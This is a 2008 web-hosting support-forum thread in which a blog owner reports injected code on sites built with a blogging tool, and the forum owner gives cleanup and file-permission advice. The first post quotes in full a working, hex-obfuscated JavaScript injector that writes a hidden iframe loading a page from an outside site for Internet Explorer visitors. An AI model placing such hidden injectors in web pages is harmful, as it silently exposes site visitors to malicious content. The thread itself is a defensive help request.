| |
Haven't registered yet? Do it here now!
 |
|
 |
|
freetwen
Joined: 04 Mar 2008
Posts: 31
|
|
|
 |
|
 |
|
 Posted: Thu Nov 13, 2008 7:22 pm Post subject: Strange Code in My BO Installs |
 |
|
|
 |
|
 |
|
|
|
|
I just noticed that some of the blogs I have indexed in google have been flagged for having malware... Most of the problem blogs are ones I have made with bo... The page was pulling from a website (I noticed it in the status at the bottom)... but I could not find the page on my site or in the source files.... I did however, find this code that I did not put there:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
Have you ever run into this or tell me how I can protect myself from this happening or what it even is? I just wonder if it has somethng to do with the server settings and someone has found out how to write to the file. Thanks. |
|
|
|
|
|
|
|
Atanasis
Owner
Joined: 22 May 2004
Posts: 4284
Location: The Net
|
|
|
|
|
|
|
| Posted: Thu Nov 13, 2008 8:03 pm Post subject: |
|
|
|
|
|
|
|
|
|
|
hi there,
yeah thats a malware code, which most times causes redirects to another sites.
Probably your server has been penetrated from somewhere. Look at other scripts you might have. I had several clients having same stuff. This is widespread hack for tgp/mgp scripts.
To fix your blogs, just go and rebuild them from BO. After that open one of them in your browser and see if in the source code if all is fine.
But don't forget to check your rest scripts and possible places from where they broke in and check any other sites you have on that server.
_________________
Thanks,
Kaktusan
 |
|
|
|
|
|
|
|
freetwen
Joined: 04 Mar 2008
Posts: 31
|
|
|
|
|
|
|
| Posted: Fri Nov 14, 2008 3:54 pm Post subject: thanks |
|
|
|
|
|
|
|
|
|
|
| i rebuilt them, but the code is still showing up in the blogs? what am i doing wrong? |
|
|
|
|
|
|
|
freetwen
Joined: 04 Mar 2008
Posts: 31
|
|
|
|
|
|
|
| Posted: Fri Nov 14, 2008 4:08 pm Post subject: take that back |
|
|
|
|
|
|
|
|
|
|
| I take that back, the code is no longer there, but when I go to the site, even directly, it is reported that it is a malware site.... does this have something to do with google? Would I need to submit the sites to webmaster tools or something? Or is the site still infected some way? thanks. |
|
|
|
|
|
|
|
Atanasis
Owner
Joined: 22 May 2004
Posts: 4284
Location: The Net
|
|
|
|
|
|
|
| Posted: Fri Nov 14, 2008 10:59 pm Post subject: |
|
|
|
|
|
|
|
|
|
|
well, it will take time till google recrawls your sites again and marks them as not containing malware. Its not happening immediately when you clean your sites..
_________________
Thanks,
Kaktusan
|
|
|
|
|
|
|
|
freetwen
Joined: 04 Mar 2008
Posts: 31
|
|
|
|
|
|
|
| Posted: Mon Nov 17, 2008 9:16 pm Post subject: Keeps coming back |
|
|
|
|
|
|
|
|
|
|
| What can I do to protect myself from this, I rebuilt all of by blogs and the code reappears a few days later? argghhh |
|
|
|
|
|
|
|
Atanasis
Owner
Joined: 22 May 2004
Posts: 4284
Location: The Net
|
|
|
|
|
|
|
| Posted: Tue Nov 18, 2008 9:05 am Post subject: |
|
|
|
|
|
|
|
|
|
|
the best protection is to find the place from where the infection starts.
other possible solution would be changing the file permissions of the BO blogs. The infection is spread to writable files, so you can try lowering the BO blogs files permissions, but you must make sure BO can still write to them. So, go to "general settings->file permissions" and lower the permissions to 755 or even 644 and rebuild all blogs..
_________________
Thanks,
Kaktusan
|
|
|
|
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
Powered by phpBB © 2001, 2002 phpBB Group
|
 |
|
 |
| |
